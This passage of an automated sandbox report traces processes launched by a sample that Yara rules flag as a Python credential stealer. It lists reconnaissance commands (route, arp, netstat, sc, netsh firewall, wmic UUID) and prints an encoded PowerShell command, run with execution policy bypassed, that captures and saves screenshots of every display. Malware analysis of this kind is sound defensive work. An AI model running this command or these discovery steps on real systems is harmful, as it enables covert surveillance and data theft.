                                                                                                                                                                                                                                        Start time:04:46:27
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\ROUTE.EXE
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:route print
                                                                                                                                                                                                                                        Imagebase:0x7ff6814a0000
                                                                                                                                                                                                                                        File size:24'576 bytes
                                                                                                                                                                                                                                        MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                        Start time:04:46:28
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\ARP.EXE
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:arp -a
                                                                                                                                                                                                                                        Imagebase:0x7ff7fc850000
                                                                                                                                                                                                                                        File size:26'624 bytes
                                                                                                                                                                                                                                        MD5 hash:2AF1B2C042B83437A4BE82B19749FA98
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                        Start time:04:46:28
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\NETSTAT.EXE
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:netstat -ano
                                                                                                                                                                                                                                        Imagebase:0x7ff782190000
                                                                                                                                                                                                                                        File size:39'936 bytes
                                                                                                                                                                                                                                        MD5 hash:7FDDD6681EA81CE26E64452336F479E6
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:45
                                                                                                                                                                                                                                        Start time:04:46:28
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:sc query type= service state= all
                                                                                                                                                                                                                                        Imagebase:0x7ff7942f0000
                                                                                                                                                                                                                                        File size:72'192 bytes
                                                                                                                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:46
                                                                                                                                                                                                                                        Start time:04:46:28
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:netsh firewall show state
                                                                                                                                                                                                                                        Imagebase:0x7ff723720000
                                                                                                                                                                                                                                        File size:96'768 bytes
                                                                                                                                                                                                                                        MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:47
                                                                                                                                                                                                                                        Start time:04:46:28
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:netsh firewall show config
                                                                                                                                                                                                                                        Imagebase:0x7ff723720000
                                                                                                                                                                                                                                        File size:96'768 bytes
                                                                                                                                                                                                                                        MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:48
                                                                                                                                                                                                                                        Start time:04:46:29
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff72b610000
                                                                                                                                                                                                                                        File size:24'189'952 bytes
                                                                                                                                                                                                                                        MD5 hash:D71750B08D81D33E6BEAD1CEB707BC4F
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000030.00000002.1538910940.000001E3006F8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000030.00000002.1564862815.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000030.00000002.1564862815.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.1564862815.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000030.00000002.1539604466.000001E3007A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000030.00000000.1524655488.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000030.00000000.1524655488.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000000.1524655488.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:49
                                                                                                                                                                                                                                        Start time:04:46:29
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:50
                                                                                                                                                                                                                                        Start time:04:46:29
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                        Imagebase:0x7ff7bc2b0000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:51
                                                                                                                                                                                                                                        Start time:04:46:30
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:52
                                                                                                                                                                                                                                        Start time:04:46:30
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:53
                                                                                                                                                                                                                                        Start time:04:46:30
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:54
                                                                                                                                                                                                                                        Start time:04:46:32
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline"
                                                                                                                                                                                                                                        Imagebase:0x7ff715b00000
                                                                                                                                                                                                                                        File size:2'759'232 bytes
                                                                                                                                                                                                                                        MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:55
                                                                                                                                                                                                                                        Start time:04:46:32
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff652c90000
                                                                                                                                                                                                                                        File size:13'747'712 bytes
                                                                                                                                                                                                                                        MD5 hash:4FD34971F2551E33806360BA5EE86E5E
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000037.00000003.1583982311.000002255B36D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000037.00000003.1583982311.000002255B36D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000037.00000003.1583982311.000002255B36D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:56
                                                                                                                                                                                                                                        Start time:04:46:32
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:57
                                                                                                                                                                                                                                        Start time:04:46:32
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6BB9.tmp" "c:\Users\user\AppData\Local\Temp\bjhgmex2\CSC140859705554C19BC8B0399D26A87.TMP"
                                                                                                                                                                                                                                        Imagebase:0x7ff6f2460000
                                                                                                                                                                                                                                        File size:52'744 bytes
                                                                                                                                                                                                                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:58
                                                                                                                                                                                                                                        Start time:04:46:36
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fe0c0000
                                                                                                                                                                                                                                        File size:24'189'952 bytes
                                                                                                                                                                                                                                        MD5 hash:D71750B08D81D33E6BEAD1CEB707BC4F
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
